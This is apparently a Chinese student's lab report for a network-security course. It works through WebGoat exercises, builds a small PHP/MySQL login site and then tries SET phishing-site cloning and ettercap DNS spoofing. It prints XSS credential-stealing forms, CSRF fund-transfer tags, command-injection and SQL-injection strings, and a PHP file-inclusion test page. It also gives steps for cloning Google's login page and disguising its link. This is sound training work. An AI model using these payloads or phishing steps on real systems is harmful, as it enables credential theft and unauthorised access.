六

20145333茹翔《网络对抗》Exp9 Web安全基础实践

20145333茹翔《网络对抗》Exp9 Web安全基础实践

基础问题回答

一、SQL注入原理，如何防护

• SQL注入

• 就是经过把SQL命令插入到“Web表单递交”或“输入域名”或“页面请求”的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。设计程序中忽略对可能构成攻击的特殊字符串的检查。后台数据库将其认做正常SQL指令后正常执行，可能实现对后台数据库进行各类操做，甚至形成破坏后台数据库等严重后果。

• 防护

• 经过正则表达式，或限制长度，对用户的输入进行校验等。

• 不要使用管理员权限的数据库链接，为每一个应用使用单独的权限有限的数据库链接。

• 不把机密信息明文存放，请加密或者hash掉密码和敏感的信息。

• 应用的异常信息应该给出尽量少的提示，最好使用自定义的错误信息对原始错误信息进行包装，把异常信息存放在独立的表中。

二、XSS攻击的原理，如何防护

• 原理：在Web页面里插入恶意Script代码，当用户浏览网页时，嵌入其中Web里面的Script代码会被执行，一个看似安全的网页却有可能盗取用户的cookies，或者登陆名密码等信息。

• 防护

• 在输入方面对用户提交的的内容进行可靠的输入验证。

• 能够对输入的地方进行输入字数控制

• 脚本执行区，禁止输入。

三、CSRF攻击原理，如何防护

• 咱们知道XSS是跨站脚本攻击，就是在用户的浏览器中执行攻击者的脚本，来得到其cookie等信息。而CSRF是借用用户的身份，向web server发送请求，由于该请求不是用户本意，因此称为“跨站请求伪造”。

• 对于CSRF的防护也能够从如下几个方面入手：

• 经过referer、token或者验证码来检测用户提交；

• 尽可能不要在页面的连接中暴露用户隐私信息，对于用户修改删除等操做最好都使用post操做；

• 避免全站通用的cookie，严格设置cookie的域。

WebGoat

• WebGoat是OWASP组织研制出的用于进行web漏洞实验的应用平台，用来讲明web应用中存在的安全漏洞。WebGoat运行在带有java虚拟机的平台之上，目前提供的训练课程有不少，包含了XSS、线程安全、SQL注入等，咱们本次的实验就是在WebGoat平台上进行。

• WebGoat分为简单版和开发板，简单版是个Java的Jar包，只须要有Java环境便可，咱们在命令行里执行：java -jar webgoat-container-7.0.1-war-exec.jar运行WebGoat

• WebGoat使用8080端口，因此在浏览器上访问localhost:8080/WebGoat，进入WebGoat以后，能够看到有不少题目来让咱们进行练习。

Cross-Site Scripting（XSS）练习

Phishing with XSS

• 这个题目咱们要在搜索框中输入XSS攻击代码，利用XSS能够在已存在的页面中进一步添加元素的特色。咱们先建立一个form，让受害人在咱们建立的form中填写用户名和密码，再添加一段JavaScript代码，读取受害人输入的用户名和密码，而且将这些信息发送给http://localhost:8080/WebGoat/catcher?PROPERTY=yes...，完整的XSS攻击代码以下：

   </form> <script> function hack(){ XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value); } </script> <form name="phish"> <br> <br> <HR> <H2>This feature requires account login:</H2> <br> <br>Enter Username:<br> <input type="text" name="user"> <br>Enter Password:<br> <input type="password" name = "pass"> <br> <input type="submit" name="login" value="login" onclick="hack()"> </form> <br> <br> <HR>

• 在搜索框中输入攻击代码后点击搜索，会看到一个要求输入用户名密码的表单，如图所示：
  

• 输入用户名密码，点击登陆，WebGoat会将你输入的信息捕获并反馈给你：
  

• 攻击成功！
  

Stored XSS Attacks

• 咱们的目标是要建立非法的消息内容，能够致使其余用户访问时载入非预期的页面或内容，在上个实验中咱们也作过，在message中输入一串代码<script>alert("rx attack succeed!");</script>
  

• 提交后，再次点击刚刚建立的帖子，成功弹出窗口，说明攻击成功：
  

Reflected XSS Attacks

• 当咱们输入错误用户信息后，服务器校验输入有误，返回错误页面并将错误内容展现给咱们看：
  

• 这时若是咱们将带有攻击性的URL做为输入源，例如依旧输入<script>alert("rx attack succeed!");</script>，就会弹出对话框：
  

• 虽然这个效果和上一个存储型XSS实验的效果相似，可是二者所用的原理不同，存储型XSS是持久化的，代码是存储在服务器中，比较典型的例子就是上面所用的留言板，而这个实验中用的是反射型XSS攻击是非持久化的，应用的场景好比欺骗用户本身去点击连接才能触发XSS代码，也就是说它的代码是不存在服务器中的，因此通常来讲存储型XSS攻击危害更大。

Cross Site Request Forgery(CSRF)

• 咱们的目的是要写一个URL诱使其余用户点击，从而触发CSRF攻击，咱们能够以图片的的形式将URL放进Message框，这时的URL对其余用户是不可见的，用户一旦点击图片，就会触发一个CSRF事件。

• 咱们在message框中输入这样一串代码：<img src="http://localhost:8080/WebGoat/attack?Screen=286&menu=900&transferFunds=4000"/>，注意这里面的Screen和menu的值每一个人的电脑可能不同，能够在Parameters进行查看

• 提交后，会在消息列表中看到一个新的消息，点击该消息，当前页面就会下载这个消息并显示出来，转走用户的4000元，从而达到CSRF攻击的目的。

CSRF Prompt By-Pass

• 咱们依旧和上一个同样要构造CSRF攻击，不过此次其包括了两个请求，一是转帐请求，二是确认转帐成功请求，即须要额外传递两个参数给服务器（transferFunds=4000，transferFunds=CONFIRM）

• 一开始我是直接在message中写入了攻击代码，可是没有成功，因而我换了一种方法，先在浏览器中手动输入URL：localhost:8080/WebGoat/attack?Screen=269&menu=900&transferFunds=5000进入确认转帐请求页面：
  

• 因而点击了CONFIRM按钮以后，再在浏览器中输入URL：localhost:8080/WebGoat/attack?Screen=268&menu=900&transferFunds=CONFIRM，成功转走了5000元：
  

Injection Flaws练习

Command Injection

• 这个题是要求可以在目标主机上执行系统命令，咱们能够经过火狐浏览器下的一个扩展Firebug对源代码进行修改，例如在BackDoors.help旁边加上"& netstat -an & ipconfig"：
  

• 以后在下拉菜单中能看到咱们修改后的值：
  

• 选中修改后的值再点view，能够看到命令被执行，出现系统网络链接状况：
  

Numeric SQL Injection

• 咱们要经过注入SQL字符串的方式查看全部的天气数据，咱们上次实验作过相似的，只要加上一个1=1这种永真式便可达到咱们的目的，依旧利用firebug，在任意一个值好比101旁边加上or 1=1：
  

• 选中Columbia，点Go，能够看到全部天气数据：
  

Log Spoofing

• 咱们输入的用户名会被追加到日志文件中，因此咱们可使用障眼法来使用户名为“admin”的用户在日志中显示“成功登陆”，在User Name文本框中输入rx%0d%0aLogin Succeeded for username: admin，其中%0d是回车，%0a是换行符：
  

• 如图所示，攻击成功：
  

String SQL Injection

• 仍是和以前同样，基于select语句构造SQL注入字符串，在文本框中输入' or 1=1 --

• 点Go，攻击成功，全部用户信息都被显示出来：
  

LAB:SQL Injection(Stage 1:String SQL Injection)

• 以用户Neville登陆，在密码栏中输入' or 1=1 --进行SQL注入，可是登陆失败：
  

• 后面查看了一下网页源码，发现输入框对输入的字符长度进行了限制，最多只容许输入8个字符：
  

• 对字符长度进行修改，而后从新登陆，登陆成功：
  

LAB:SQL Injection(Stage 3:Numeric SQL Injection)

• 咱们仍是用上一题的办法先以用户名Larry登陆，登陆以后看到浏览员工信息的按钮是ViewProfile：
  

• 在网页代码中分析一下这个按钮，发现这个地方是以员工ID做为索引传递参数的，咱们要达到经过Larry来浏览老板帐户信息的目的，通常来讲老板的工资都应该是最高的，因此把其中的value值改成101 or 1=1 order by salary desc --，这样老板的信息就会被排到第一个：
  

• 以后就能够查看到老板的信息：
  

Database Backdoors

• 先输一个101，获得了该用户的信息：
  

• 能够发现输入的语句没有验证，很容易进行SQL注入，输入注入语句：101; update employee set salary=10000，成功把该用户的工资涨到了10000：
  

实验问题回答

（1）什么是表单

• 表单是一个包含表单元素的区域，表单元素是容许用户在表单中（好比：文本域、下拉列表、单选框、复选框等等）输入信息的元素，表单在网页中主要负责数据采集功能，一个表单有三个基本组成部分：表单标签、表单域、表单按钮

（2）浏览器能够解析运行什么语言。

• 支持HTML（超文本标记语言）、XML（可扩展标记语言）以及Python、PHP、JavaScript、ASP等众多脚本语言。

（3）WebServer支持哪些动态语言

• JavaScript、ASP、PHP、Ruby等脚本语言。

实践过程记录

Apache

• 先经过apachectl start命令开启Apach,使用netstat -aptn命令查看端口占用

• 由于端口号80已经被占用（上次实验设置的），因此先修改/etc/apache2/ports.conf里的端口为5333后从新开启：
  

• 能够在浏览器中输入localhost：5333来检查是否正常开启，这里能够看到打开了上次实验的网页，开启正常：
  

简单的网页编写

• 访问Apache工做目录cd /var/www/html，新建一个5333.html文件

• 编写一个含有表单的html
  

• 打开浏览器访问：localhost:5333/5333.html，成功出现以下界面
  

• 在上面的文本框内键入几个字母，而后点击确认按钮数据会传送到 "html_form_action.php" 的页面，因为没有对此页面进行编辑，出现的是404
  

javascript相关

• 相关概念：JavaScript是一种普遍用于客户端Web开发的脚本语言，经常使用来给HTML网页添加动态功能，好比响应用户的各类操做。
• 文档对象模型(Document Object Model，简称DOM，是W3C组织推荐的处理可扩展标志语言的标准编程接口。

• 编写验证用户名和密码的规则：（好比用户名和密码不能为空）

  <script> function nameText(){ var name= document.getElementByIdx_x ("username"); var divID= document.getElementByIdx_x ("divName"); divID.innerHTML=""; if(name.value==""){ divID.innerHTML="用户名不能为空"; return false; } } function passText(){ var pass= document.getElementByIdx_x ("password"); var divIP= document.getElementByIdx_x ("divPass"); divIP.innerHTML=""; if(pass.value==""){ divIP.innerHTML="密码不能为空"; return false; } } </script>

PHP测试

• 新建一个PHP测试文件vi /var/www/html/test.php，输入以下

  <?php
  echo ($_GET["A"]);

  include($_GET["A"]); echo "php page 5212!<br>";

  ?>

• 用浏览器打开localhost:5333/test.pgp，能够看见以下界面，测试成功
  

MySQL基础

• 使用命令/etc/init.d/mysql start打开mysql服务

• 输入mysql -u root -p，并根据提示输入密码，默认密码为p@ssw0rd，进入MySQL:
  

• 可使用命令show databases；能够查看基本信息（分号不能够漏掉,分号表明命令的结束）：
  

• 能够经过以下方式更改密码：

·输入use mysql;，选择mysql数据库

·输入select user, password, host from user;，mysql库中的user表中存储着用户名、密码与权限

·输入UPDATE user SET password=PASSWORD("新密码") WHERE user='root';

·输入flush privileges;，更新权限

·输入quit退出

• 从新登陆就能够发现密码修改为功

• 在Mysql中建库建表，输入以下

  CREATE SCHEMA 库表的名称;
  CREATE TABLE 库表的名称.users (
  userid INT NOT NULL COMMENT '',
  username VARCHAR(45) NULL COMMENT '',
  password VARCHAR(256) NULL COMMENT '',
  enabled VARCHAR(5) NULL COMMENT '',
  PRIMARY KEY (userid) COMMENT '');
  

• 向表中添加用户
  

• 如今再查看信息就能够看到新建表：
  

php+mysql编写网页

• 在/var/www/html文件夹下输入vim login.html，编写登陆网页
  

• 输入vim login.php，经过php实现对数据库的链接
  

• 在浏览器中输入localhost:5333/login.html访问本身的登录页面
  

• 在登陆页面中输入数据库中存有的用户名和密码并点击提交进行用户认证登陆成功，输入数据库中没有的就会认证失败
  
  

SQL注入

• SQL注入是经过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。
  具体来讲，它是利用现有应用程序，将(恶意的)SQL命令注入到后台数据库引擎执行的能力，它能够经过在Web表单中输入(恶意)SQL语句获得一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句。
  简单地说，SQL注入的产生缘由一般是将用户输入的字符串，当成了 “sql语句” 来执行。

• 构造SQL语句：在用户名输入框中输入' or 1=1#,密码随便输入，这时候的合成后的SQL查询语句为select * from users where username='' or 1=1#' and password=md5('')
  如下的两句sql语句等价：
  select * from users where username='' or 1=1#' and password=md5('')
select * from users where username='' or 1=1

• 由于1=1永远是都是成立的，即where子句老是为真，因此可以成功登陆
  
  

• 经过SQL注入将用户名和密码保存在数据库中

  ';insert into users(userid,username,password,enabled) values(5333,'145333',password("145333"),"TRUE");#

  
  

• 在登陆页面输入用户名145333密码145333，成功
  

XSS攻击

• XSS攻击：跨站脚本攻击(Cross Site Scripting)，为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSS。XSS是一种常常出如今web应用中的计算机安全漏洞，它容许恶意web用户将代码植入到提供给其它用户使用的页面中。好比这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞因为被骇客用来编写危害性更大的phishing攻击而变得广为人知。对于跨站脚本攻击，黑客界共识是：跨站脚本攻击是新型的“缓冲区溢出攻击“，而JavaScript是新型的“ShellCode”。

• 进行一个简单的测试，在用户名输入框中输入<img src="20145333.jpg" />20145333</a>读取/var/www/html目录下的图片:
  

• 点击登陆后咱们能够看到图片：
  

发帖和会话管理的实现

• 咱们能够利用PHP实现会话管理，这部分实践能够详细参考ltc同窗的博客与代码。
  将代码依旧放在/var/www/html目录下，在浏览器中输入http://localhost:5333/logIn.php，进行登陆：
  

• 登陆成功后如图所示：
  

• 点击start a new post!发帖，进入以下界面：
  

• 提交以后跳转到以下界面，能够选择查看发过的帖子、继续发帖、返回或者退出登陆：
  

• 点击CHECK查看发过的帖子，可是却什么内容都没有，因为这个操做是经过从data.txt文件中读取以前发帖时保存的记录来查看发帖内容，可是在/var/www/html目录下根本没有找到这个文件，这就说明以前建立也没有成功，后面发现/var/www/html底下文件默认的都是属于root的，其余用户没有权限进行操做，因此咱们能够先使用touch data.txt建一个data.txt文件，再对该文件进行加权：
  

• 再次发帖查看，能够成功显示以前的发帖历史：
  

1.实验后回答问题

（1）一般在什么场景下容易受到DNS spoof攻击

• 局域网内的攻击，arp入侵攻击和DNS欺骗攻击

• 公共wifi点上的攻击。

（2）在平常生活工做中如何防范以上两攻击方法

• 输入我的信息前先检查域名地址是否正确
• 访问一些重要的网站时，尽可能避免使用DNS，直接使用IP地址登陆。

3.实践过程记录

简单应用SET工具创建冒名网站

• 确保kali和靶机能ping通；

• 为了使得apache开启后，靶机经过ip地址能够直接访问到网页，apache的监听端口号应该为80，因而进行查看与修改。查看80端口是否被占用，个人被PID=571的进程占用了，kill这个进程。
  

• 在终端中输入命令：sudo vi /etc/apache2/ports.conf

• 修改apache的配置文件中的监听端口为80
  

• 在终端中输入命令：apachectl start打开apache2.
• 新开一个终端窗口输入：setoolkit，出现以下开启界面。

• 选择1（社会工程学攻击）
  

• 选择2，网页攻击
  

• 选择3，钓鱼网站攻击
  

• 选择2，克隆网站
  

• 输入kali的IP，克隆的网页：http://www.google.cn/，开始监听
  

• 克隆好的钓鱼网站不能直接发送IP地址，须要对网页域名进行假装，以诱骗收信人的点击。登入：http://short.php5developer.com/，以下图所示输入kali的ip后，点击short，获得假装地址
  

• 将获得假装地址在靶机的浏览器中打开，会先出现以下图示的界面：
  

• 10秒后会跳转到一个google登陆界面，输入帐号登陆：
  

• 在kali端的/var/www/html的文件夹下，会自动生成一个以攻击时间命名的文件，打开后会看到相关登陆信息
  

• 作这个实验时，我第一次选了QQ邮箱mail.qq.com，结果最后出不了预期的结果，抓不到信息，而后选了Google的登陆网站才成功。

ettercap DNS spoof

• 输入命令：ifconfig eth0 promisc改kali网卡为混杂模式

• 对ettercap的dns文件进行编辑。输入命令vi /etc/ettercap/etter.dns，在以下图示的位置添加两条指令：
  

• 查看主机的IP与网关。

• 在cmd中输入ping baidu.com，查看百度的ip地址。
  

• 开始在kali中攻击，输入ettercap -G,开启ettercap，会自动弹出来一个ettercap的可视化界面，点击工具栏中的Sniff——>unified sniffing.
  

• 选择eth0——>ok
  

• 在工具栏中的host下点击扫描子网，并查看存活主机

• 而后将网关和主机IP分别添加到Target 1 和 Target 2。
  

• 点击Mitm选项，选择远程链接
  

• 点击plugins——>manage plugins选项。选择DNS_Spoof，点击右上角的start开始sniffing
  

• 在windows系统下cmd中输入ping baidu.com，能够发现，已经成功链接到kali上了。
  

• 在浏览器中访问www.rx.baidu.com,就会跳转到以前克隆的网页